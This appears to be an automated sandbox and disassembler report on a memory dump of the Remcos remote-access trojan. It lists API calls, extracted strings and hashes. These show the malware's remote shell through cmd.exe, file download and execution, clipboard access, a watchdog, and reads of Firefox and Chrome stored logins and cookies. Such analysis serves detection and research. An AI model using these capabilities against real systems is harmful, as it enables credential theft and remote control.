                                                                                                    • Instruction ID: 7b6f63586de962cf13c642be8f044126cb3c52731424b67aaf056de8313b57d0
                                                                                                    • Opcode Fuzzy Hash: 01e24c4520a6d3c4395155137d096ef59c3bb50acc7407598b25046a660799bf
                                                                                                    • Instruction Fuzzy Hash: 41B092B9108302BFCA160B60CC0887A7EA6ABC8786B00882CF546421B0C636C460AB2A
                                                                                                    APIs
                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00410B6B
                                                                                                      • Part of subcall function 00412268: RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
                                                                                                      • Part of subcall function 00412268: RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
                                                                                                      • Part of subcall function 00412268: RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C
                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410BAB
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00410BBA
                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00411253,00000000,00000000,00000000), ref: 00410C10
                                                                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00410E7F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                                                    • String ID: (#G$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$!G
                                                                                                    • API String ID: 3018269243-1736093966
                                                                                                    • Opcode ID: a15711cddb90d189596898be9212fb7ab5da8f90ee9ea4abc79a21609cf7d5df
                                                                                                    • Instruction ID: e4f63523a9081b51a3adb9d06d528b7104d503695ba60a117a14e5ebfa22ea95
                                                                                                    • Opcode Fuzzy Hash: a15711cddb90d189596898be9212fb7ab5da8f90ee9ea4abc79a21609cf7d5df
                                                                                                    • Instruction Fuzzy Hash: DD71923160430167C604FB62DD67DAE73A8AE91308F50097FF546621E2EEBC9E49C69F
                                                                                                    APIs
                                                                                                    • SetEvent.KERNEL32(?,?), ref: 00406D4A
                                                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00406E18
                                                                                                    • DeleteFileW.KERNEL32(00000000), ref: 00406E3A
                                                                                                      • Part of subcall function 0041A01B: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00472200,00000001), ref: 0041A076
                                                                                                      • Part of subcall function 0041A01B: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00472200,00000001), ref: 0041A0A6
                                                                                                      • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00472200,00000001), ref: 0041A0FB
                                                                                                      • Part of subcall function 0041A01B: FindClose.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A15C
                                                                                                      • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A163
                                                                                                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                                      • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                                      • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,0040545D,?,?,00000004,?,?,00000004,?,00471E90,?), ref: 00404B27
                                                                                                      • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00471E90,?,?,?,?,?,?,0040545D), ref: 00404B55
                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407228
                                                                                                    • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00407309
                                                                                                    • DeleteFileA.KERNEL32(?), ref: 0040768E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$Find$DeleteDirectoryEventRemove$AttributesCloseDriveExecuteFirstLocalLogicalNextObjectShellSingleStringsTimeWaitsend
                                                                                                    • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                                                                                                    • API String ID: 1385304114-1507758755
                                                                                                    • Opcode ID: 9562a3d966e66de215cd70958b56b0286d998ffc789974a8c60729faf031d709
                                                                                                    • Instruction ID: 48d75f04ed6415a86b5419c4bbb4b80b443badeb9edbc79095c7941e671ccbd4
                                                                                                    • Opcode Fuzzy Hash: 9562a3d966e66de215cd70958b56b0286d998ffc789974a8c60729faf031d709
                                                                                                    • Instruction Fuzzy Hash: EE42A771A043005BC604FB76C86B9AE77A9AF91304F40493FF542671E2EE7D9A09C79B
                                                                                                    APIs
                                                                                                    • __Init_thread_footer.LIBCMT ref: 004056C6
                                                                                                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                                    • __Init_thread_footer.LIBCMT ref: 00405703
                                                                                                    • CreatePipe.KERNEL32(00473BB4,00473B9C,00473AC0,00000000,00463068,00000000), ref: 00405796
                                                                                                    • CreatePipe.KERNEL32(00473BA0,00473BBC,00473AC0,00000000), ref: 004057AC
                                                                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00473AD0,00473BA4), ref: 0040581F
                                                                                                    • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405877
                                                                                                    • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040589C
                                                                                                    • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058C9
                                                                                                      • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                                                                                    • WriteFile.KERNEL32(00000000,00000000,?,00000000,00471F28,0046306C,00000062,00463050), ref: 004059C4
                                                                                                    • Sleep.KERNEL32(00000064,00000062,00463050), ref: 004059DE
                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 004059F7
                                                                                                    • CloseHandle.KERNEL32 ref: 00405A03
                                                                                                    • CloseHandle.KERNEL32 ref: 00405A0B
                                                                                                    • CloseHandle.KERNEL32 ref: 00405A1D
                                                                                                    • CloseHandle.KERNEL32 ref: 00405A25
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                    • String ID: SystemDrive$cmd.exe
                                                                                                    • API String ID: 2994406822-3633465311
                                                                                                    • Opcode ID: 4568db86e005e5ee8b267df344be70a7839f6dd1d3c8f420728b284f3f3e7f32
                                                                                                    • Instruction ID: 60b94bd4732a7a61eda53217d638a5a8398e5d64ba0573e0a23605d008395794
                                                                                                    • Opcode Fuzzy Hash: 4568db86e005e5ee8b267df344be70a7839f6dd1d3c8f420728b284f3f3e7f32
                                                                                                    • Instruction Fuzzy Hash: 2991D571600204AFC710BF65AC52D6F3698EB44745F00443FF949A72E3DA7CAE489B6E
                                                                                                    APIs
                                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040AAF0
                                                                                                    • FindClose.KERNEL32(00000000), ref: 0040AB0A
                                                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040AC2D
                                                                                                    • FindClose.KERNEL32(00000000), ref: 0040AC53
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Find$CloseFile$FirstNext
                                                                                                    • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                    • API String ID: 1164774033-3681987949
                                                                                                    • Opcode ID: c4a8a3561dda33a316002e905d5158176c4bb62f60b9ed2c5276f134ba47fa8b
                                                                                                    • Instruction ID: fcfcc6101c27069c9b98dcbc284c26b589152974821445ccf2a2d41a2abcc6ea
                                                                                                    • Opcode Fuzzy Hash: c4a8a3561dda33a316002e905d5158176c4bb62f60b9ed2c5276f134ba47fa8b
                                                                                                    • Instruction Fuzzy Hash: DD516C7190021A9ADB14FBB1DC96EEEB738AF10309F50057FF406720E2FF785A458A5A
                                                                                                    APIs
                                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040ACF0
                                                                                                    • FindClose.KERNEL32(00000000), ref: 0040AD0A
                                                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040ADCA
                                                                                                    • FindClose.KERNEL32(00000000), ref: 0040ADF0
                                                                                                    • FindClose.KERNEL32(00000000), ref: 0040AE11
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Find$Close$File$FirstNext
                                                                                                    • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                    • API String ID: 3527384056-432212279
                                                                                                    • Opcode ID: 3b5b8b69b03ca4378a7fc1b44b4c034fda2df619af0ad02dc3fa9ed3aead64ba
                                                                                                    • Instruction ID: fb37dd61a783c7e48c67abb1194b5e9e6d585cff7aa156a37ad31c809035e36e
                                                                                                    • Opcode Fuzzy Hash: 3b5b8b69b03ca4378a7fc1b44b4c034fda2df619af0ad02dc3fa9ed3aead64ba
                                                                                                    • Instruction Fuzzy Hash: 33417E7190021A5ACB14FBB1DC56DEEB729AF11306F50057FF402B21D2EF789A468A9E
                                                                                                    APIs
                                                                                                    • OpenClipboard.USER32 ref: 00414EC2
                                                                                                    • EmptyClipboard.USER32 ref: 00414ED0
                                                                                                    • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 00414EF0
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00414EF9
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00414F2F
                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00414F38
                                                                                                    • CloseClipboard.USER32 ref: 00414F55
                                                                                                    • OpenClipboard.USER32 ref: 00414F5C
                                                                                                    • GetClipboardData.USER32(0000000D), ref: 00414F6C
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00414F75
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
                                                                                                    • CloseClipboard.USER32 ref: 00414F84
                                                                                                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3520204547-0
                                                                                                    • Opcode ID: 3e1616ad11adebc6658c68cf8d8c69f9fd655134579bc9701aa075f92177f950
                                                                                                    • Instruction ID: 88f859f6ed4527f0268ca0f0dcff7fecf11b3a85ebb64268ee3e6238e9d0ca75
                                                                                                    • Opcode Fuzzy Hash: 3e1616ad11adebc6658c68cf8d8c69f9fd655134579bc9701aa075f92177f950
                                                                                                    • Instruction Fuzzy Hash: C32162312043009BD714BF71DC5A9BE76A8AF90746F81093EF906931E3EF3889458A6A
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00472200,00000001), ref: 0041A076
                                                                                                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00472200,00000001), ref: 0041A0A6
                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00472200,00000001), ref: 0041A118
                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00472200,00000001), ref: 0041A125
                                                                                                      • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00472200,00000001), ref: 0041A0FB
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00472200,00000001), ref: 0041A146
                                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A15C
                                                                                                    • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A163
                                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A16C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                    • String ID: pth_unenc
                                                                                                    • API String ID: 2341273852-4028850238
                                                                                                    • Opcode ID: 6646849479acfbb23c7f6e30dece2f39408b91799c0e2f504d1e8212b579ce47
                                                                                                    • Instruction ID: c5fafce0dbccb0860899da49af80cd87a4a733faaf08891c553187227cdc222a
                                                                                                    • Opcode Fuzzy Hash: 6646849479acfbb23c7f6e30dece2f39408b91799c0e2f504d1e8212b579ce47
                                                                                                    • Instruction Fuzzy Hash: 5F31937290121C6ADB20EBA0DC49EDB77BCAB08305F4406FBF558D3152EB39DAD48A19
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 0$1$2$3$4$5$6$7
                                                                                                    • API String ID: 0-3177665633
                                                                                                    • Opcode ID: 05f2545c527969495595f266b9e9e19f26da2af4dc4ec233c9d36f06689b886f
                                                                                                    • Instruction ID: 7e6592d3055df16b324e67483fbf58bd1f951358f7384255f7d9d01b5e43b049
                                                                                                    • Opcode Fuzzy Hash: 05f2545c527969495595f266b9e9e19f26da2af4dc4ec233c9d36f06689b886f
                                                                                                    • Instruction Fuzzy Hash: 7661D4709183019ED704EF21D8A1FAB7BB4DF94310F10881FF5A25B2D1DA789A49CBA6
                                                                                                    APIs
                                                                                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004727F8), ref: 00418714
                                                                                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00418763
                                                                                                    • GetLastError.KERNEL32 ref: 00418771
                                                                                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 004187A9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3587775597-0
                                                                                                    • Opcode ID: 567a02d3676939b60cead921024e5a933565feb35c1b84cad879b30dce2cf72b
                                                                                                    • Instruction ID: 6ce88c058296d2c3b0169cbae3b24baff62e3479be35c2318cb4853598c639b3
                                                                                                    • Opcode Fuzzy Hash: 567a02d3676939b60cead921024e5a933565feb35c1b84cad879b30dce2cf72b
                                                                                                    • Instruction Fuzzy Hash: 04814071104344ABC304FB62DC959AFB7E8FF94708F50092EF58552192EE78EA49CB9A
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040B2DC
                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0040B3AF
                                                                                                    • FindClose.KERNEL32(00000000), ref: 0040B3BE
                                                                                                    • FindClose.KERNEL32(00000000), ref: 0040B3E9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Find$CloseFile$FirstNext
                                                                                                    • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                    • API String ID: 1164774033-405221262
                                                                                                    • Opcode ID: 9c058fecf71ecf543ce4a6c3142fc7a7cd4101ecce290fbc294f270e2533023f
                                                                                                    • Instruction ID: 883258bb694cc85cc249d311a8318fbda55549897f82b44e5d780b3967986c9e
                                                                                                    • Opcode Fuzzy Hash: 9c058fecf71ecf543ce4a6c3142fc7a7cd4101ecce290fbc294f270e2533023f
                                                                                                    • Instruction Fuzzy Hash: 7D31533190025996CB14FBA1DC9ADEE7778AF50718F10017FF405B21D2EFBC9A4A8A8D
                                                                                                    APIs
                                                                                                    • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129B8
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129C4
                                                                                                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                                    • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 00412CBA
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00412CC1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                    • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                    • API String ID: 2127411465-314212984
                                                                                                    • Opcode ID: a724b9dba66fb6bebdb0991e936cd89d1f538ff17713a100e8e63ad2c8436f04
                                                                                                    • Instruction ID: 16181ac17c5890234a95f9c719cc05f83ad3eef33587bd03cd2ae8bf1541d7ce
                                                                                                    • Opcode Fuzzy Hash: a724b9dba66fb6bebdb0991e936cd89d1f538ff17713a100e8e63ad2c8436f04
                                                                                                    • Instruction Fuzzy Hash: CCE1DA72A0430067CA14B776DD57DAF36A8AF91318F40053FF946F71E2EDBD8A44829A
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 00446741
                                                                                                    • _free.LIBCMT ref: 00446765
                                                                                                    • _free.LIBCMT ref: 004468EC
                                                                                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 004468FE
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 00446976
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 004469A3
                                                                                                    • _free.LIBCMT ref: 00446AB8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                    • String ID:
                                                                                                    • API String ID: 314583886-0
                                                                                                    • Opcode ID: f10dbbcf1c7f1cbe3000b24275e3ebb89d70debee14c63034f39d691e6cb2945
                                                                                                    • Instruction ID: 8b87e38212d70e432f0d45c21c10c2da0ad9042405ab808e013634feac4ff008
                                                                                                    • Opcode Fuzzy Hash: f10dbbcf1c7f1cbe3000b24275e3ebb89d70debee14c63034f39d691e6cb2945
                                                                                                    • Instruction Fuzzy Hash: 67C15CB1900245ABFB24AF79DC41AAA7BB8EF03314F16416FE48497341EB788E45C75E
                                                                                                    APIs
                                                                                                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040A98F
                                                                                                    • GetLastError.KERNEL32 ref: 0040A999
                                                                                                    Strings
                                                                                                    • UserProfile, xrefs: 0040A95F
                                                                                                    • [Chrome StoredLogins not found], xrefs: 0040A9B3
                                                                                                    • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040A95A
                                                                                                    • [Chrome StoredLogins found, cleared!], xrefs: 0040A9BF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: DeleteErrorFileLast
                                                                                                    • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                    • API String ID: 2018770650-1062637481
                                                                                                    • Opcode ID: e2dc748f8a2f2c202dc5dfde2945bc6c5171a76981be289e4bc3f19e588866b0
                                                                                                    • Instruction ID: b2134abed7c3f614b53a5a28bf05479c5c2a11b403a78876888f6ce5fd1f590e
                                                                                                    • Opcode Fuzzy Hash: e2dc748f8a2f2c202dc5dfde2945bc6c5171a76981be289e4bc3f19e588866b0
                                                                                                    • Instruction Fuzzy Hash: 7801F271B9020466CA047A75DC2B8BE7728A921304B90057FF402732E2FE7D8A1586CF
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
                                                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
                                                                                                    • GetLastError.KERNEL32 ref: 00415CDB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                    • API String ID: 3534403312-3733053543
                                                                                                    • Opcode ID: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
                                                                                                    • Instruction ID: ffc0972e6e84a8b4c82c7ff824774f91a9d221977230a9de1ecf93d0fe8dbf87
                                                                                                    • Opcode Fuzzy Hash: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
                                                                                                    • Instruction Fuzzy Hash: 0AF03A71901229ABDB10ABA1ED4DEEF7F7CEF05616F510060B805A2152D6749A04CAB5
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00408393
                                                                                                      • Part of subcall function 004048A8: connect.WS2_32(?,?,?), ref: 004048C0
                                                                                                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040842F
                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040848D
                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 004084E5
                                                                                                    • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 004084FC
                                                                                                      • Part of subcall function 00404E06: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E18
                                                                                                      • Part of subcall function 00404E06: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E23
                                                                                                      • Part of subcall function 00404E06: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E2C
                                                                                                    • FindClose.KERNEL32(00000000), ref: 004086F4
                                                                                                      • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,0040545D,?,?,00000004,?,?,00000004,?,00471E90,?), ref: 00404B27
                                                                                                      • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00471E90,?,?,?,?,?,?,0040545D), ref: 00404B55
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                                                    • String ID:
                                                                                                    • API String ID: 1824512719-0
                                                                                                    • Opcode ID: 2d04ef65f79b6d4a761471fa0904ac1a104409f79b1bf8440fe588cad0436fe0
                                                                                                    • Instruction ID: 071b26812b5e49f88d0361c7bacc9152bfce797c8686ce15524b94070306fde2
                                                                                                    • Opcode Fuzzy Hash: 2d04ef65f79b6d4a761471fa0904ac1a104409f79b1bf8440fe588cad0436fe0
                                                                                                    • Instruction Fuzzy Hash: 4FB18D329001099BCB14FBA1CD92AEDB378AF50318F50416FE506B71E2EF785B49CB98
                                                                                                    APIs
                                                                                                      • Part of subcall function 00410201: SetLastError.KERNEL32(0000000D,00410781,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 00410207
                                                                                                    • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041079C
                                                                                                    • GetNativeSystemInfo.KERNEL32(?,0040BE60,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041080A
                                                                                                    • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 0041082E
                                                                                                      • Part of subcall function 00410708: VirtualAlloc.KERNEL32(00000004,00000004,00000004,00000004,0041084C,?,00000000,00003000,00000004,00000000,?,?), ref: 00410718
                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00410875
                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0041087C
                                                                                                    • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041098F
                                                                                                      • Part of subcall function 00410ADC: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,0041099C,?,?,?,?,?), ref: 00410B4C
                                                                                                      • Part of subcall function 00410ADC: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00410B53
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                                                    • String ID:
